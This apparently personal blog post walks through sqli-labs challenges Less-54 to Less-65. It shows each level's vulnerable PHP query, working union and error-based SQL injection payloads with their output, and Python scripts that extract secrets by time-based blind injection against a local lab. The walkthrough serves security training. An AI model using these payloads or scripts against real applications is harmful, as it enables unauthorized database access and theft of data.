Sqli-lab Challenges Write up

  1. 1. Basic
  • Challenges
    1. 1. Less-54
    2. 2. Less-55
    3. 3. Less-56
    4. 4. Less-57
    5. 5. Less-58
    6. 6. Less-59
    7. 7. Less-60
    8. 8. Less-61
    9. 9. Less-62
    10. 10. Less-63
    11. 11. Less-64
    12. 12. Less-65

    Sqli-lab Less54-65 writeup

    Basic

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    show databases;         //查看数据库

    use xxx; //使用某个数据库

    show tables; //查看该数据库的数据表

    desc xxx; //查看该数据表的结构

    select * from xxx; //查找某个数据表的所有内容

    select schema_name from information_schema.schemata; //猜数据库

    select table_name from information_schema.tables where table_schema='xxx';//猜某数据库的数据表

    Select column_name from information_schema.columns where table_name='xxx';//猜某表的所有列

    left(a,b); //从左侧截取 a 的前 b 位

    mid(column_name,start[,length]); //从位置start开始,截取column_name字符串的length位,与substr作用相同

    substr(string, start, length); //从位置start开始,截取字符串stringlength长度,与mid作用相同

    ascii(); //将某个字符转换成ascii码

    ord(); //将某个字符转换成ascii码,同ascii()

    Challenges

    Less-54

    1
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

    没什么过滤,直接上

    1
    0' union select 1,group_concat(schema_name),2 from information_schema.schemata;%23

    得到

    1
    2
    Your Login name:information_schema,challenges,mysql,performance_schema,security
    Your Password:2

    爆破表

    1
    0' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23

    得到

    1
    2
    Your Login name:QGVTNCJQK6
    Your Password:2

    爆破列

    1
    0' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='QGVTNCJQK6';%23

    得到

    1
    2
    Your Login name:id,sessid,secret_9YQQ,tryy
    Your Password:2

    爆破内容

    1
    0' union select id,secret_9YQQ,tryy from QGVTNCJQK6;%23

    得到

    1
    2
    Your Login name:UEGTp3YhAO1wSaVNixYIWwMl
    Your Password:3

    Less-55

    1
    $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

    也是没什么过滤,直接上

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    0) union select 1,group_concat(schema_name),2 from information_schema.schemata;%23
    Your Login name:information_schema,challenges,mysql,performance_schema,security

    0) union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
    Your Login name:HSTKPKBJZX

    0) union select 1,group_concat(column_name),2 from information_schema.columns where table_name='HSTKPKBJZX';%23
    Your Login name:id,sessid,secret_Y1KS,tryy

    0) union select id,secret_Y1KS,tryy from HSTKPKBJZX;%23
    Your Login name:BsZ12SElz8qNeK2rvFOTYpkb

    Less-56

    1
    $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
    1
    2
    3
    4
    5
    6
    7
    8
    0') union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
    Your Login name:70ULR981EI

    0') union select 1,group_concat(column_name),2 from information_schema.columns where table_name='70ULR981EI';%23
    Your Login name:id,sessid,secret_KPCG,tryy

    0') union select id,secret_KPCG,tryy from 70ULR981EI;%23
    Your Login name:t8Q1iKTajlerR65fY1P8Lu8I

    Less-57

    1
    2
    3
    $id= '"'.$id.'"';
    // Querry DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

    增加了"

    1
    2
    3
    4
    5
    6
    7
    8
    0" union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
    Your Login name:28YHZGI481

    0" union select 1,group_concat(column_name),2 from information_schema.columns where table_name='28YHZGI481';%23
    Your Login name:id,sessid,secret_152D,tryy

    0" union select id,secret_152D,tryy from 28YHZGI481;%23
    Your Login name:u1TfmRa1qunL2c4bGqZv4H6J

    Less-58

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";
    }

    可以看到,查询结果被用作数组序号,输出被改了,但是mysql_error()被打印了,所以我们可以直接用报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~HG2RC34XP0~'

    0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='HG2RC34XP0'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_7IXP,tryy~'

    0' and updatexml(1,concat(0x7e,(select secret_7IXP from HG2RC34XP0),0x7e),1);%23
    XPATH syntax error: '~m20SLP9m0za56xuhE7s1awqR~'

    Less-59

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    // Querry DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";
    }

    还是按照之前的用报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    0 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~EANMX28TXI~'

    0 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='EANMX28TXI'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_Z6IM,tryy~'

    0 and updatexml(1,concat(0x7e,(select secret_Z6IM from EANMX28TXI),0x7e),1);%23
    XPATH syntax error: '~tEwpAjainXQeyDLGeSG1nuok~'

    Less-60

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    $id = '("'.$id.'")';
    // Querry DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";
    }

    直接加上")绕过,依然可以用报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    0") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~5OJBK8U9XQ~'

    0") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5OJBK8U9XQ'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_8GHX,tryy~'

    0") and updatexml(1,concat(0x7e,(select secret_8GHX from 5OJBK8U9XQ),0x7e),1);%23
    XPATH syntax error: '~Ij8p6anZKPghpsC4S5Ti9mgi~'

    Less-61

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    // Querry DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";
    }

    直接加上'))绕过,依然可以用报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    0')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~MP94IBBMTL~'

    0')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MP94IBBMTL'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_QN8H,tryy~'

    0')) and updatexml(1,concat(0x7e,(select secret_QN8H from MP94IBBMTL),0x7e),1);%23
    XPATH syntax error: '~CieVXfic1dl9FuqHdChc2we3~'

    Less-62

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    // Querry DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    // print_r(mysql_error());
    echo "</font>";
    }

    因为注释了print_r(mysql_error()),无法用报错注入。因为还有尝试次数,只能用延时注入

    写了一下 jio 本,写的比较渣

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    # encoding: utf-8
    import requests
    import re

    index_url = "http://localhost:8081/Less-62/index.php?id="

    header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    cookie = {
    'challenge':'7b4184899f8b788841fb3eaf29177fdc',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''


    # for i in range(1,11):
    # print(i)
    # for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    # j = ord(j)
    # # payload = "0') or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    # url = index_url + payload
    # try:
    # r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # # print(r.text)
    # except:
    # flag += chr(j)
    # print(flag)
    # break

    # flag = 'secret_'
    # for i in range(8,12):
    # print(i)
    # for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    # j = ord(j)
    # payload = "0') or if((ascii(substr((select column_name from information_schema.columns where table_name='WMBY8Y9EUL' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    # url = index_url + payload
    # try:
    # r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # # print(r.text)
    # except:
    # flag += chr(j)
    # print(flag)
    # break
    #secret_WPTM

    for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
    j = ord(j)
    payload = "0') or if((ascii(substr((select secret_WPTM from WMBY8Y9EUL),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # print(r.text)
    except:
    flag += chr(j)
    print(flag)
    break
    #mtvo4Z0u4wqd0nLRwxnydled

    Less-63

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    // print_r(mysql_error());
    echo "</font>";
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    # encoding: utf-8
    import requests
    import re

    index_url = "http://localhost:8081/Less-63/index.php?id="

    header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    cookie = {
    'challenge':'31a6b5568bbb9c350c1b296d9086acf0',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''
    table = ''
    column = ''

    for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    j = ord(j)
    payload = "0' or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    except:
    flag += chr(j)
    print(flag)
    break

    table = flag
    print("################################# table is %s" % table)
    flag = 'secret_'
    for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    j = ord(j)
    payload = "0' or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # print(r.text)
    except:
    flag += chr(j)
    print(flag)
    break

    column = flag
    print("################################# column is %s" % column)
    flag = ''

    for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
    j = ord(j)
    payload = "0' or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # print(r.text)
    except:
    flag += chr(j)
    print(flag)
    break
    print("################################# key is %s" % flag)

    Less-64

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    // Querry DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    // print_r(mysql_error());
    echo "</font>";
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    # encoding: utf-8
    import requests
    import re

    index_url = "http://localhost:8081/Less-64/index.php?id="

    header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    cookie = {
    'challenge':'6efa4aae76d29c330a3636356fa5386c',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''
    table = ''
    column = ''

    for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    j = ord(j)
    payload = "0)) or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    except:
    flag += chr(j)
    print(flag)
    break

    table = flag
    print("################################# table is %s" % table)
    flag = 'secret_'
    for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    j = ord(j)
    payload = "0)) or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # print(r.text)
    except:
    flag += chr(j)
    print(flag)
    break

    column = flag
    print("################################# column is %s" % column)
    flag = ''

    for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
    j = ord(j)
    payload = "0)) or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # print(r.text)
    except:
    flag += chr(j)
    print(flag)
    break
    print("################################# key is %s" % flag)

    Less-65

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    $id = '"'.$id.'"';
    // Querry DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font color= "#00FFFF">';
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
    }
    else
    {
    echo '<font color= "#FFFF00">';
    // print_r(mysql_error());
    echo "</font>";
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    # encoding: utf-8
    import requests
    import re

    index_url = "http://localhost:8081/Less-65/index.php?id="

    header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    cookie = {
    'challenge':'caf415945acc41218462264d7e211f37',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''
    table = ''
    column = ''

    for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    j = ord(j)
    payload = "0\") or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    except:
    flag += chr(j)
    print(flag)
    break

    table = flag
    print("################################# table is %s" % table)
    flag = 'secret_'
    for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    j = ord(j)
    payload = "0\") or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # print(r.text)
    except:
    flag += chr(j)
    print(flag)
    break

    column = flag
    print("################################# column is %s" % column)
    flag = ''

    for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
    j = ord(j)
    payload = "0\") or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    url = index_url + payload
    try:
    r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # print(r.text)
    except:
    flag += chr(j)
    print(flag)
    break
    print("################################# key is %s" % flag)

  • Article Author: Zeddy

    Article Link: https://blog.zeddyu.info/2019/03/04/Sqli-lab Challenges Write up/index.html

    Copyright Notice: With the exception of the special statement at the beginning of the article, all articles can be reprinted in accordance with the CC BY 4.0 agreement with the author's permission.

    Sql注入备忘录 Sqli-lab速刷记录(1-53)

    Comments

    Your browser is out-of-date!

    Update your browser to view this website correctly. Update my browser now

    ×